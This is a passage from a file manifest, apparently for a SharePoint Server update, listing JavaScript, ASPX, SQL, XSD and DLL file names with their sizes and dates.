\npivotcontrol.debug.js| pivotcontrol.debug.js| | 16089| 15-Sep-20| 11:36 \npivotcontrol.js| pivotcontrol.js| | 8700| 15-Sep-20| 11:36 \nquicklaunch.debug.js| quicklaunch.debug.js| | 130124| 15-Sep-20| 11:36 \nquicklaunch.js| quicklaunch.js| | 69543| 15-Sep-20| 11:36 \nquicklaunch.js.xml| quicklaunch.xml| | 120| 15-Sep-20| 11:36 \nradiobuttonwithchildren.js| radiobuttonwithchildren.js| | 3208| 15-Sep-20| 11:36 \nroamingapps.debug.js| roamingapps.debug.js| | 46291| 15-Sep-20| 11:36 \nroamingapps.js| roamingapps.js| | 19190| 15-Sep-20| 11:36 \nroamingapp.xml| roamingapps.xml| | 93| 15-Sep-20| 11:36 \nsharing.debug.js| sharing.debug.js| | 71639| 15-Sep-20| 11:36 \nsharing.js| sharing.js| | 27124| 15-Sep-20| 11:36 \nsharing.xml| sharing.xml| | 171| 15-Sep-20| 11:36 \nsiteupgrade.debug.js| siteupgrade.debug.js| | 1135| 15-Sep-20| 11:36 \nsiteupgrade.debug.js_14| siteupgrade.debug.js| | 1135| 15-Sep-20| 11:36 \nsiteupgrade.js| siteupgrade.js| | 808| 15-Sep-20| 11:36 \nsiteupgrade.js_14| siteupgrade.js| | 808| 15-Sep-20| 11:36 \nsp.core.debug.js| sp.core.debug.js| | 73924| 15-Sep-20| 11:36 \nsp.core.js| sp.core.js| | 40446| 15-Sep-20| 11:36 \nsp.core.xml| sp.core.xml| | 150| 15-Sep-20| 11:36 \nsp.datetimeutil.debug.js| sp.datetimeutil.debug.js| | 115909| 15-Sep-20| 11:36 \nsp.datetimeutil.debug.js.x64| sp.datetimeutil.debug.js| | 115909| 15-Sep-20| 11:36 \nsp.datetimeutil.js| sp.datetimeutil.js| | 69042| 15-Sep-20| 11:36 \nsp.datetimeutil.js.x64| sp.datetimeutil.js| | 69042| 15-Sep-20| 11:36 \nsp.datetimeutil.xml| sp.datetimeutil.xml| | 69| 15-Sep-20| 11:36 \nsp.debug.js| sp.debug.js| | 1003478| 15-Sep-20| 11:36 \nsp.debug.js.x64| sp.debug.js| | 1003478| 15-Sep-20| 11:36 \nsp.exp.debug.js| sp.exp.debug.js| | 40770| 15-Sep-20| 11:36 \nsp.exp.js| sp.exp.js| | 24528| 15-Sep-20| 11:36 \nsp.exp.xml| sp.exp.xml| | 48| 15-Sep-20| 11:36 \nsp.init.debug.js| sp.init.debug.js| | 55563| 15-Sep-20| 11:36 \nsp.init.js| sp.init.js| | 32205| 15-Sep-20| 11:36 \nsp.js| sp.js| | 625818| 15-Sep-20| 11:36 \nsp.js.x64| sp.js| | 625818| 15-Sep-20| 11:36 \nspmap.debug.js| sp.map.debug.js| | 15227| 15-Sep-20| 11:36 \nspmap.js| sp.map.js| | 8235| 15-Sep-20| 11:36 \nspmap.xml| sp.map.xml| | 65| 15-Sep-20| 11:36 \nsp.requestexecutor.debug.js| sp.requestexecutor.debug.js| | 81201| 15-Sep-20| 11:36 \nsp.requestexecutor.debug.js.x64| sp.requestexecutor.debug.js| | 81201| 15-Sep-20| 11:36 \nsp.requestexecutor.js| sp.requestexecutor.js| | 51540| 15-Sep-20| 11:36 \nsp.requestexecutor.js.x64| sp.requestexecutor.js| | 51540| 15-Sep-20| 11:36 \nsp.requestexecutor.xml| sp.requestexecutor.xml| | 46| 15-Sep-20| 11:36 \nsp.ribbon.debug.js| sp.ribbon.debug.js| | 363159| 15-Sep-20| 11:36 \nsp.ribbon.js| sp.ribbon.js| | 224039| 15-Sep-20| 11:36 \nsp.ribbon.xml| sp.ribbon.xml| | 321| 15-Sep-20| 11:36 \nsp.runtime.debug.js| sp.runtime.debug.js| | 185617| 15-Sep-20| 11:36 \nsp.runtime.debug.js.x64| sp.runtime.debug.js| | 185617| 15-Sep-20| 11:36 \nsp.runtime.js| sp.runtime.js| | 111493| 15-Sep-20| 11:36 \nsp.runtime.js.x64| sp.runtime.js| | 111493| 15-Sep-20| 11:36 \nsp.runtime.xml| sp.runtime.xml| | 46| 15-Sep-20| 11:36 \nsp.storefront.debug.js| sp.storefront.debug.js| | 422688| 15-Sep-20| 11:36 \nsp.storefront.js| sp.storefront.js| | 294435| 15-Sep-20| 11:36 \nsp.storefront.xml| sp.storefront.xml| | 346| 15-Sep-20| 11:36 \nsp.ui.admin.debug.js| sp.ui.admin.debug.js| | 18342| 15-Sep-20| 11:36 \nsp.ui.admin.js| sp.ui.admin.js| | 11378| 15-Sep-20| 11:36 \nsp.ui.allapps.debug.js| sp.ui.allapps.debug.js| | 42395| 15-Sep-20| 11:36 \nsp.ui.allapps.js| sp.ui.allapps.js| | 26257| 15-Sep-20| 11:36 \nsp.ui.applicationpages.calendar.debug.js| sp.ui.applicationpages.calendar.debug.js| | 277454| 15-Sep-20| 11:36 \nsp.ui.applicationpages.calendar.js| sp.ui.applicationpages.calendar.js| | 144914| 15-Sep-20| 11:36 \nsp.ui.applicationpages.calendar.xml| sp.ui.applicationpages.calendar.xml| | 225| 15-Sep-20| 11:36 \nsp.ui.applicationpages.debug.js| sp.ui.applicationpages.debug.js| | 10163| 15-Sep-20| 11:36 \nsp.ui.applicationpages.js| sp.ui.applicationpages.js| | 6953| 15-Sep-20| 11:36 \nsp.ui.applicationpages.xml| sp.ui.applicationpages.xml| | 213| 15-Sep-20| 11:36 \nsp.ui.bdcadminpages.debug.js| sp.ui.bdcadminpages.debug.js| | 16063| 15-Sep-20| 11:36 \nsp.ui.bdcadminpages.js| sp.ui.bdcadminpages.js| | 11315| 15-Sep-20| 11:36 \nspblogd.js| sp.ui.blogs.debug.js| | 50644| 15-Sep-20| 11:36 \nspblog.js| sp.ui.blogs.js| | 31017| 15-Sep-20| 11:36 \nsp.ui.blogs.xml| sp.ui.blogs.xml| | 94| 15-Sep-20| 11:36 \nsp.ui.combobox.debug.js| sp.ui.combobox.debug.js| | 99428| 15-Sep-20| 11:36 \nsp.ui.combobox.js| sp.ui.combobox.js| | 52107| 15-Sep-20| 11:36 \nsp.ui.combobox.xml| sp.ui.combobox.xml| | 54| 15-Sep-20| 11:36 \nsp.ui.controls.debug.js| sp.ui.controls.debug.js| | 55987| 15-Sep-20| 11:36 \nsp.ui.controls.js| sp.ui.controls.js| | 38359| 15-Sep-20| 11:36 \nsp.ui.dialog.debug.js| sp.ui.dialog.debug.js| | 69292| 15-Sep-20| 11:36 \nsp.ui.dialog.js| sp.ui.dialog.js| | 40375| 15-Sep-20| 11:36 \nsp.ui.dialog.xml| sp.ui.dialog.xml| | 90| 15-Sep-20| 11:36 \nspdiscd.js| sp.ui.discussions.debug.js| | 136506| 15-Sep-20| 11:36 \nspdisc.js| sp.ui.discussions.js| | 82216| 15-Sep-20| 11:36 \nsp.ui.discussions.xml| sp.ui.discussions.xml| | 94| 15-Sep-20| 11:36 \nspimgcd.js| sp.ui.imagecrop.debug.js| | 27973| 15-Sep-20| 11:36 \nspimgc.js| sp.ui.imagecrop.js| | 27973| 15-Sep-20| 11:36 \nspui_rid.js| sp.ui.relateditems.debug.js| | 28006| 15-Sep-20| 11:36 \nspui_ri.js| sp.ui.relateditems.js| | 17626| 15-Sep-20| 11:36 \nsp.ui.ri.xml| sp.ui.relateditems.xml| | 114| 15-Sep-20| 11:36 \nsp.ui.rte.debug.js| sp.ui.rte.debug.js| | 1011981| 15-Sep-20| 11:36 \nsp.ui.rte.js| sp.ui.rte.js| | 584358| 15-Sep-20| 11:36 \nsp.ui.rte.xml| sp.ui.rte.xml| | 74| 15-Sep-20| 11:36 \nsp.ui.tileview.debug.js| sp.ui.tileview.debug.js| | 65203| 15-Sep-20| 11:36 \nsp.ui.tileview.js| sp.ui.tileview.js| | 40240| 15-Sep-20| 11:36 \nsp.ui.tileview.xml| sp.ui.tileview.xml| | 129| 15-Sep-20| 11:36 \nspui_tld.js| sp.ui.timeline.debug.js| | 434522| 15-Sep-20| 11:36 \nspui_tl.js| sp.ui.timeline.js| | 240067| 15-Sep-20| 11:36 \nspstl.xml| sp.ui.timeline.xml| | 111| 15-Sep-20| 11:36 \nsp.xml| sp.xml| | 106| 15-Sep-20| 11:36 \nspgantt.debug.js| spgantt.debug.js| | 183484| 15-Sep-20| 11:36 \nspgantt.js| spgantt.js| | 66168| 15-Sep-20| 11:36 \nspgantt.xml| spgantt.xml| | 159| 15-Sep-20| 11:36 \nspgridview.debug.js| spgridview.debug.js| | 7321| 15-Sep-20| 11:36 \nspgridvw.js| spgridview.js| | 4593| 15-Sep-20| 11:36 \nspgridview.xml| spgridview.xml| | 92| 15-Sep-20| 11:36 \nstart.debug.js| start.debug.js| | 174744| 15-Sep-20| 11:36 \nstart.js| start.js| | 95780| 15-Sep-20| 11:36 \nstrings.xml| strings.xml| | 140| 15-Sep-20| 11:36 \nsuitelinks.debug.js| suitelinks.debug.js| | 32558| 15-Sep-20| 11:36 \nsuitelnk.js| suitelinks.js| | 13795| 15-Sep-20| 11:36 \nsuitelinks.xml| suitelinks.xml| | 134| 15-Sep-20| 11:36 \nsuitenav.js| suitenav.js| | 34319| 15-Sep-20| 11:36 \ntimecard.debug.js| timecard.debug.js| | 36906| 15-Sep-20| 11:36 \ntimecard.js| timecard.js| | 20888| 15-Sep-20| 11:36 \nwpadder.debug.js| wpadder.debug.js| | 49561| 15-Sep-20| 11:36 \nwpadder.js| wpadder.js| | 31016| 15-Sep-20| 11:36 \nwpcm.debug.js| wpcm.debug.js| | 6894| 15-Sep-20| 11:36 \nwpcm.js| wpcm.js| | 3509| 15-Sep-20| 11:36 \nmain.xsl| main.xsl| | 5745| 15-Sep-20| 11:36 \nallitems.asx_0086| allitems.aspx| | 2463| 15-Sep-20| 11:36 \ndispform.asx_0071| dispform.aspx| | 4190| 15-Sep-20| 11:36 \neditform.asx_0071| editform.aspx| | 4167| 15-Sep-20| 11:36 \nmyitems.asx_0008| myitems.aspx| | 2718| 15-Sep-20| 11:36 \nnewform.asx_0055| newform.aspx| | 4197| 15-Sep-20| 11:36 \nschema.xml_0012| schema.xml| | 253482| 15-Sep-20| 11:36 \nallitems.asx_0089| allitems.aspx| | 2463| 15-Sep-20| 11:36 \ndispform.asx_0083| dispform.aspx| | 4190| 15-Sep-20| 11:36 \neditform.asx_0083| editform.aspx| | 4167| 15-Sep-20| 11:36 \nmyitems.asx_0009| myitems.aspx| | 2718| 15-Sep-20| 11:36 \nnewform.asx_0062| newform.aspx| | 4197| 15-Sep-20| 11:36 \nschema.xml_0027| schema.xml| | 245825| 15-Sep-20| 11:36 \nmtgredir.asx_0001| mtgredir.aspx| | 1436| 15-Sep-20| 11:36 \nnewmws.asx| newmws.aspx| | 18858| 15-Sep-20| 11:36 \nmovetodt.asx| movetodt.aspx| | 3075| 15-Sep-20| 11:36 \nschema.xml_0079| schema.xml| | 79705| 15-Sep-20| 11:36 \nallitems.asx_0088| allitems.aspx| | 2463| 15-Sep-20| 11:36 \ndispform.asx_0082| dispform.aspx| | 4190| 15-Sep-20| 11:36 \neditform.asx_0082| editform.aspx| | 4167| 15-Sep-20| 11:36 \nnewform.asx_0061| newform.aspx| | 4197| 15-Sep-20| 11:36 \nschema.xml_0026| schema.xml| | 127795| 15-Sep-20| 11:36 \nallitems.asx_0087| allitems.aspx| | 2463| 15-Sep-20| 11:36 \ndispform.asx_0072| dispform.aspx| | 4190| 15-Sep-20| 11:36 \neditform.asx_0072| editform.aspx| | 4167| 15-Sep-20| 11:36 \nmanagea.asx| managea.aspx| | 2718| 15-Sep-20| 11:36 \nnewform.asx_0056| newform.aspx| | 5954| 15-Sep-20| 11:36 \nschema.xml_0021| schema.xml| | 255145| 15-Sep-20| 11:36 \ndefault.aspx_mps| default.aspx| | 4102| 15-Sep-20| 11:36 \nspstd1.asx_0004| spstd1.aspx| | 4134| 15-Sep-20| 11:36 \nallitems.asx_0032| allitems.aspx| | 2463| 15-Sep-20| 11:36 \ndispform.asx_0038| dispform.aspx| | 4190| 15-Sep-20| 11:36 \neditform.asx_0040| editform.aspx| | 4167| 15-Sep-20| 11:36 \nnewform.asx_0021| newform.aspx| | 4197| 15-Sep-20| 11:36 \nschema.xml_0039| schema.xml| | 42852| 15-Sep-20| 11:36 \nallitems.asx_0090| allitems.aspx| | 2463| 15-Sep-20| 11:36 \ndispform.asx_0084| dispform.aspx| | 4190| 15-Sep-20| 11:36 \neditform.asx_0084| editform.aspx| | 4167| 15-Sep-20| 11:36 \nmyitems.asx_0001| myitems.aspx| | 2718| 15-Sep-20| 11:36 \nnewform.asx_0063| newform.aspx| | 4197| 15-Sep-20| 11:36 \nschema.xml_0028| schema.xml| | 245557| 15-Sep-20| 11:36 \nschema.xml_0033| schema.xml| | 51432| 15-Sep-20| 11:36 \nonet.xml_mps| onet.xml| | 20985| 15-Sep-20| 11:36 \nnotif.clbk.typ.xml| notificationcallbacktypes.xml| | 1267| 15-Sep-20| 11:36 \nform.asp_pages_form| form.aspx| | 4065| 15-Sep-20| 11:36 \nview.asp_pages_viewpage| viewpage.aspx| | 2718| 15-Sep-20| 11:36 \nview.asp_pages_webfldr| webfldr.aspx| | 2521| 15-Sep-20| 11:36 \nresxscriptx.xsd| resxscriptx.xsd| | 1229| 15-Sep-20| 11:36 \nsvrfiles.xml| serverfiles.xml| | 213| 15-Sep-20| 11:36 \nshrulee.xsd| sitehealthruleregistrationerror.xsd| | 1909| 15-Sep-20| 11:36 \nshrulew.xsd| sitehealthruleregistrationwarning.xsd| | 1911| 15-Sep-20| 11:36 \nsitehcwss.xml| sitehealthwssrules.xml| | 1010| 15-Sep-20| 11:36 \nsitehcwss.xml_14| sitehealthwssrules.xml| | 1010| 15-Sep-20| 11:36 \nspkvp.xsd| spkeyvaluepairs.xsd| | 1727| 15-Sep-20| 11:36 \nspmtlprm.xsd| spmetalparameters.xsd| | 3857| 15-Sep-20| 11:36 \nappmng.sql| appmng.sql| | 289219| 15-Sep-20| 11:36 \nappmngup.sql| appmngup.sql| | 282966| 15-Sep-20| 11:36 \nbdc.sql| bdc.sql| | 558446| 15-Sep-20| 11:36 \nconfigdb.sql| configdb.sql| | 189484| 15-Sep-20| 11:36 \nconfigup.sql| configup.sql| | 48486| 15-Sep-20| 11:36 \ncfgupddl.sql| configupddl.sql| | 131| 15-Sep-20| 11:36 \nusgdiag.sql| diagnostics.sql| | 19977| 15-Sep-20| 11:36 \nsigcfg.cer| sigconfigdb.cer| | 689| 15-Sep-20| 11:36 \nsigcfg.dll| sigconfigdb.dll| | 8832| 15-Sep-20| 11:36 \nsigstore.cer| sigstore.cer| | 689| 15-Sep-20| 11:36 \nsigstore.dll| sigstore.dll| | 8816| 15-Sep-20| 11:36 \nstore.sql| store.sql| | 6504340| 15-Sep-20| 11:36 \nstoreup.sql| storeup.sql| | 512275| 15-Sep-20| 11:36 \nstoupddl.sql| storeupddl.sql| | 131| 15-Sep-20| 11:36 \nsubscr.sql| subscriptionsettings.sql| | 33788| 15-Sep-20| 11:36 \nusagedb.sql| usagedb.sql| | 81583| 15-Sep-20| 11:36 \nusgdbup.sql| usgdbup.sql| | 81392| 15-Sep-20| 11:36 \naddbact.asx| addbdcaction.aspx| | 13019| 15-Sep-20| 11:36 \naddbapp.asx| addbdcapplication.aspx| | 9266| 15-Sep-20| 11:36 \naddiurl.asx| addincomingurl.aspx| | 4473| 15-Sep-20| 11:36 \nadmin.smp| admin.sitemap| | 15577| 15-Sep-20| 11:36 \nadmcfgc.asx| adminconfigceip.aspx| | 7764| 15-Sep-20| 11:36 \nadmcfgi.asx| adminconfigintro.aspx| | 8689| 15-Sep-20| 11:36 \nadmcfgr.asx| adminconfigresults.aspx| | 5038| 15-Sep-20| 11:36 \nadmcfgs.asx| adminconfigservices.aspx| | 9937| 15-Sep-20| 11:36 \nadmcfgsr.asx| adminconfigservicesresults.aspx| | 4998| 15-Sep-20| 11:36 \nadminweb.cfg| adminweb.config| | 899| 15-Sep-20| 11:36 \nallappprincipals.asx| allappprincipals.aspx| | 6808| 15-Sep-20| 11:36 \nalturls.asx| alternateurlcollections.aspx| | 7122| 15-Sep-20| 11:36 \nappassoc.asx| applicationassociations.aspx| | 5259| 15-Sep-20| 11:36 \nappasdlg.asx| applicationassociationsdialog.aspx| | 3519| 15-Sep-20| 11:36 \nappcreat.asx| applicationcreated.aspx| | 4106| 15-Sep-20| 11:36 \nauthen.asx| authentication.aspx| | 13828| 15-Sep-20| 11:36 \nauthprov.asx| authenticationproviders.aspx| | 4939| 15-Sep-20| 11:36 \navadmin.asx| avadmin.aspx| | 9653| 15-Sep-20| 11:36 \nbackup.asx| backup.aspx| | 15389| 15-Sep-20| 11:36 \nbackhis.asx| backuphistory.aspx| | 20577| 15-Sep-20| 11:36 \nbackset.asx| backupsettings.aspx| | 8689| 15-Sep-20| 11:36 \nbackupst.asx| backupstatus.aspx| | 10643| 15-Sep-20| 11:36 \nbdcapps.asx| bdcapplications.aspx| | 14415| 15-Sep-20| 11:36 \nbdclobs.asx| bdclobsettings.aspx| | 7037| 15-Sep-20| 11:36 \nblkftyp.asx| blockedfiletype.aspx| | 4045| 15-Sep-20| 11:36 \ncaaapplm.asx| ca_allapplicensesmanagement.aspx| | 8267| 15-Sep-20| 11:36 \ncasapplm.asx| ca_specificapplicensemanagement.aspx| | 29344| 15-Sep-20| 11:36 \ncntdbadm.asx| cntdbadm.aspx| | 6042| 15-Sep-20| 11:36 \nconfgssc.asx| configssc.aspx| | 22074| 15-Sep-20| 11:36 \nconfgapp.asx| configureappsettings.aspx| | 7246| 15-Sep-20| 11:36 \ncreatecorpcatalog.asx| createcorporatecatalog.aspx| | 18174| 15-Sep-20| 11:36 \ncreatexu.asx| createexternalurl.aspx| | 4182| 15-Sep-20| 11:36 \ncreatsit.asx| createsite.aspx| | 17064| 15-Sep-20| 11:36 \ndbstats.asx| databasestatus.aspx| | 5023| 15-Sep-20| 11:36 \ndeacfadm.asx| deactivatefeature.aspx| | 3184| 15-Sep-20| 11:36 \ndftcntdb.asx| defaultcontentdb.aspx| | 6455| 15-Sep-20| 11:36 \ndelstcfg.asx| deletesiteconfig.aspx| | 12279| 15-Sep-20| 11:36 \ndelapp.asx| deletewebapplication.aspx| | 6619| 15-Sep-20| 11:36 \ndelsite.asx| delsite.aspx| | 7267| 15-Sep-20| 11:36 \ndplysoln.asx| deploysolution.aspx| | 10122| 15-Sep-20| 11:36 \ndmscmd.aspx| dmscmd.aspx| | 5593| 15-Sep-20| 11:36 \ndtcusta.asx| doctrancustomizeadmin.aspx| | 7789| 15-Sep-20| 11:36 \ndoctrana.asx| doctransadmin.aspx| | 7797| 15-Sep-20| 11:36 \ndspset.asx| dspsettings.aspx| | 14863| 15-Sep-20| 11:36 \neditacct.asx| editaccount.aspx| | 18305| 15-Sep-20| 11:36 \neditbact.asx| editbdcaction.aspx| | 12661| 15-Sep-20| 11:36 \neditiurl.asx| editincomingurl.aspx| | 4683| 15-Sep-20| 11:36 \neditourl.asx| editoutboundurls.aspx| | 7201| 15-Sep-20| 11:36 \nexpbapp.asx| exportbdcapplication.aspx| | 8043| 15-Sep-20| 11:36 \nextendvs.asx| extendvs.aspx| | 7113| 15-Sep-20| 11:36 \nextvsopt.asx| extendvsoption.aspx| | 5077| 15-Sep-20| 11:36 \nextwebfm.asx| extendwebfarm.aspx| | 5418| 15-Sep-20| 11:36 \nfarmjoin.asx| farmconfigjoinintro.aspx| | 8354| 15-Sep-20| 11:36 \nfarmcred.asx| farmcredentialmanagement.aspx| | 7541| 15-Sep-20| 11:36 \nfarmsvrs.asx| farmservers.aspx| | 4910| 15-Sep-20| 11:36 \ngemlcnfg.asx| globalemailconfig.aspx| | 8560| 15-Sep-20| 11:36 \ngmobcnfg.asx| globalxmsconfig.aspx| | 8407| 15-Sep-20| 11:36 \nhealrepo.asx| healthreport.aspx| | 6265| 15-Sep-20| 11:36 \nhtadmin.asx| htmltransadmin.aspx| | 10141| 15-Sep-20| 11:36 \nincemail.asx| incomingemail.aspx| | 22300| 15-Sep-20| 11:36 \nirmadmin.asx| irmadmin.aspx| | 8837| 15-Sep-20| 11:36 \njobedit.asx| jobedit.aspx| | 8303| 15-Sep-20| 11:36 \nlogusage.asx| logusage.aspx| | 14424| 15-Sep-20| 11:36 \nlropsta.asx| lroperationstatus.aspx| | 4915| 15-Sep-20| 11:36 \nmgbdcper.asx| managebdcpermissions.aspx| | 5485| 15-Sep-20| 11:36 \nmgbdcapp.asx| managebdcserviceapp.aspx| | 6684| 15-Sep-20| 11:36 \nmgappinf.asx| managebdcserviceappstateinfo.aspx| | 4613| 15-Sep-20| 11:36 \nmngcorpcatalog.asx| managecorporatecatalog.aspx| | 9289| 15-Sep-20| 11:36 \nmngaccts.asx| managedaccounts.aspx| | 5952| 15-Sep-20| 11:36 \nmngffeat.asx| managefarmfeatures.aspx| | 3273| 15-Sep-20| 11:36 \nmktplset.asx| managemarketplacesettings.aspx| | 7972| 15-Sep-20| 11:36 \nmngqtmpl.asx| managequotatemplate.aspx| | 18002| 15-Sep-20| 11:36 \nmngsftru.asx| manageservicefarmtrust.aspx| | 4743| 15-Sep-20| 11:36 \nmngtrust.asx| managetrust.aspx| | 6911| 15-Sep-20| 11:36 \nmngwfeat.asx| managewebappfeatures.aspx| | 4334| 15-Sep-20| 11:36 \nmetrics.asx| metrics.aspx| | 15273| 15-Sep-20| 11:36 \nadmin.mas| admin.master| | 29828| 15-Sep-20| 11:36 \nappascvw.asc| applicationassociationsview.ascx| | 4379| 15-Sep-20| 11:36 \napppool.asc| applicationpoolsection.ascx| | 8668| 15-Sep-20| 11:36 \nbsqmopt.asc| browserceipsection.ascx| | 2776| 15-Sep-20| 11:36 \ncerstsec.asc| certificatesettingsection.ascx| | 10758| 15-Sep-20| 11:36 \ncntdbsec.asc| contentdatabasesection.ascx| | 7964| 15-Sep-20| 11:36 \nidprosec.asc| identityprovidersettingsection.ascx| | 16007| 15-Sep-20| 11:36 \niiswsapp.asc| iiswebserviceapplicationpoolsection.ascx| | 8772| 15-Sep-20| 11:36 \niiswbste.asc| iiswebsitesection.ascx| | 14964| 15-Sep-20| 11:36 \npopup.mas| popup.master| | 3088| 15-Sep-20| 11:36 \nproxysel.asx| proxyselectionsection.ascx| | 5393| 15-Sep-20| 11:36 \nregacctl.asc| registeraccountcontrol.ascx| | 10073| 15-Sep-20| 11:36 \nrunjobs.asc| runningtimerjobs.ascx| | 4696| 15-Sep-20| 11:36 \nschedjob.asc| scheduledtimerjobs.ascx| | 3583| 15-Sep-20| 11:36 \ntjobhist.asc| timerjobhistory.ascx| | 5114| 15-Sep-20| 11:36 \ntopology.asc| topologyview.ascx| | 4091| 15-Sep-20| 11:36 \ntstgesec.asc| trustgeneralsettingsection.ascx| | 3656| 15-Sep-20| 11:36 \nnewappmngsvcapp.asx| newappmngserviceapp.aspx| | 6664| 15-Sep-20| 11:36 \nnewcntdb.asx| newcntdb.aspx| | 7208| 15-Sep-20| 11:36 \nofadmin.asx| officialfileadmin.aspx| | 13569| 15-Sep-20| 11:36 \noldcntdb.asx| oldcntdb.aspx| | 13658| 15-Sep-20| 11:36 \nowners.asx| owners.aspx| | 5602| 15-Sep-20| 11:36 \npwdset.asx| passwordsettings.aspx| | 8443| 15-Sep-20| 11:36 \npatchstt.asx| patchstatus.aspx| | 7284| 15-Sep-20| 11:36 \npolc.asx| policy.aspx| | 14387| 15-Sep-20| 11:36 \npolcanon.asx| policyanon.aspx| | 7109| 15-Sep-20| 11:36 \npolcrl.asx| policyrole.aspx| | 116092| 15-Sep-20| 11:36 \npolcrle.asx| policyroleedit.aspx| | 116100| 15-Sep-20| 11:36 \npolcrls.asx| policyroles.aspx| | 10688| 15-Sep-20| 11:36 \npolcusr.asx| policyuser.aspx| | 10142| 15-Sep-20| 11:36 \npolcusre.asx| policyuseredit.aspx| | 12411| 15-Sep-20| 11:36 \nprivacy.asx| privacy.aspx| | 8269| 15-Sep-20| 11:36 \nregacct.asx| registeraccount.aspx| | 4058| 15-Sep-20| 11:36 \nremacct.asx| removeaccount.aspx| | 8676| 15-Sep-20| 11:36 \nreqfeata.asx| reqfeatures.aspx| | 2625| 15-Sep-20| 11:36 \nrestore.asx| restore.aspx| | 16105| 15-Sep-20| 11:36 \nrestore3.asx| restorestep3.aspx| | 22878| 15-Sep-20| 11:36 \nrtctsoln.asx| retractsolution.aspx| | 7381| 15-Sep-20| 11:36 \nschedjob.asx| scheduledtimerjobs.aspx| | 7063| 15-Sep-20| 11:36 \nscprefix.asx_0001| scprefix.aspx| | 11391| 15-Sep-20| 11:36 \nslctauc.asx| selectalternateurlcollection.aspx| | 5141| 15-Sep-20| 11:36 \nslctapp.asx| selectapplication.aspx| | 6801| 15-Sep-20| 11:36 \nslctcfaz.asx| selectcrossfirewallaccesszone.aspx| | 5398| 15-Sep-20| 11:36 \nslctjob.asx| selectjobdefinition.aspx| | 5358| 15-Sep-20| 11:36 \nslctlist.asx| selectlist.aspx| | 8606| 15-Sep-20| 11:36 \nslctserv.asx| selectserver.aspx| | 4908| 15-Sep-20| 11:36 \nslctsvc.asx| selectservice.aspx| | 4982| 15-Sep-20| 11:36 \nslctsite.asx| selectsite.aspx| | 9385| 15-Sep-20| 11:36 \nslctweb.asx| selectweb.aspx| | 8459| 15-Sep-20| 11:36 \nslctwapp.asx| selectwebapplication.aspx| | 5356| 15-Sep-20| 11:36 \nserver.asx| server.aspx| | 9131| 15-Sep-20| 11:36 \nsvcappcn.asx| serviceapplicationconnect.aspx| | 4890| 15-Sep-20| 11:36 \nsvcappcd.asx| serviceapplicationconnectiondetails.aspx| | 4334| 15-Sep-20| 11:36 \nsvcappcp.asx| serviceapplicationconnectpopup.aspx| | 2991| 15-Sep-20| 11:36 \nsvcappdl.asx| serviceapplicationdelete.aspx| | 4443| 15-Sep-20| 11:36 \nsvcapppe.asx| serviceapplicationpermissions.aspx| | 4034| 15-Sep-20| 11:36 \nsvcapppb.asx| serviceapplicationpublish.aspx| | 10169| 15-Sep-20| 11:36 \nsvcapp.asx| serviceapplications.aspx| | 4101| 15-Sep-20| 11:36 \nsvcjdefs.asx| servicejobdefinitions.aspx| | 8692| 15-Sep-20| 11:36 \nsvcrjobs.asx| servicerunningjobs.aspx| | 7059| 15-Sep-20| 11:36 \nspdadmin.asx| sharepointdesigneradmin.aspx| | 6974| 15-Sep-20| 11:36 \nsiteex.asx| siteandlistexport.aspx| | 12299| 15-Sep-20| 11:36 \nsitebaks.asx| sitebackuporexportstatus.aspx| | 10242| 15-Sep-20| 11:36 \nsitecbac.asx| sitecollectionbackup.aspx| | 10522| 15-Sep-20| 11:36 \nsitecoll.asx| sitecollections.aspx| | 9189| 15-Sep-20| 11:36 \nsitcrted.asx| sitecreated.aspx| | 3632| 15-Sep-20| 11:36 \nsitequot.asx| sitequota.aspx| | 24323| 15-Sep-20| 11:36 \nsolns.asx| solutions.aspx| | 4786| 15-Sep-20| 11:36 \nsolnsts.asx| solutionstatus.aspx| | 10835| 15-Sep-20| 11:36 \nsolvmgr.asx| solutionvalidatormanager.aspx| | 10912| 15-Sep-20| 11:36 \nspadmin.rsx| spadmin.resx| | 359899| 15-Sep-20| 11:36 \nspscrstg.asx_0002| spsecuritysettings.aspx| | 7491| 15-Sep-20| 11:36 \nstbackup.asx| startbackup.aspx| | 14510| 15-Sep-20| 11:36 \nsuccessp.asx| successpopup.aspx| | 3735| 15-Sep-20| 11:36 \ntimer.asx| timer.aspx| | 8984| 15-Sep-20| 11:36 \ntjobhist.asx| timerjobhistory.aspx| | 8860| 15-Sep-20| 11:36 \nunatcdbb.asx| unattacheddbbrowse.aspx| | 6276| 15-Sep-20| 11:36 \nunatcdb.asx| unattacheddbselect.aspx| | 6082| 15-Sep-20| 11:36 \nunxtndvs.asx| unextendvs.aspx| | 5541| 15-Sep-20| 11:36 \nupgrstat.asx| upgradestatus.aspx| | 11239| 15-Sep-20| 11:36 \nuser_solution.asx| usersolutions.aspx| | 9435| 15-Sep-20| 11:36 \nviewbapp.asx| viewbdcapplication.aspx| | 17212| 15-Sep-20| 11:36 \nviewbent.asx| viewbdcentity.aspx| | 17275| 15-Sep-20| 11:36 \nvwblobi.asx| viewbdclobsysteminstances.aspx| | 10960| 15-Sep-20| 11:36 \nvwblobs.asx| viewbdclobsystems.aspx| | 14303| 15-Sep-20| 11:36 \nvsemail.asx| vsemail.aspx| | 8991| 15-Sep-20| 11:36 \nvsgenset.asx| vsgeneralsettings.aspx| | 52139| 15-Sep-20| 11:36 \nvsmask.asx| vsmask.aspx| | 65273| 15-Sep-20| 11:36 \nvsxms.asx| vsxms.aspx| | 8803| 15-Sep-20| 11:36 \nweblist.asx| webapplicationlist.aspx| | 5468| 15-Sep-20| 11:36 \nwebapps.asx| webapplications.aspx| | 5350| 15-Sep-20| 11:36 \nwfadmin.asx| workflowadmin.aspx| | 6741| 15-Sep-20| 11:36 \nwftimer.asx| workflowtimer.aspx| | 5101| 15-Sep-20| 11:36 \nacrqdlg.asc| accessrequestsdialog.ascx| | 3059| 15-Sep-20| 11:36 \narplfc.asc| accessrequestspermissionlevelfieldcontrol.ascx| | 1145| 15-Sep-20| 11:36 \nacctpick.asc| accountpickerandlink.ascx| | 2347| 15-Sep-20| 11:36 \nacledito.asc| acleditor.ascx| | 9596| 15-Sep-20| 11:36 \nactnbar.asc_0002| actionbar.ascx| | 2464| 15-Sep-20| 11:36 \nbdcfindc.asc| bdcfinderconfigurator.ascx| | 3309| 15-Sep-20| 11:36 \nbdflded.asc| businessdatafieldeditor.ascx| | 4216| 15-Sep-20| 11:36 \ndefformt.asc| defaulttemplates.ascx| | 178739| 15-Sep-20| 11:36 \ndemocon.asc| designmodeconsole.ascx| | 2329| 15-Sep-20| 11:36 \ndispprev.asc| displaypreview.ascx| | 5491| 15-Sep-20| 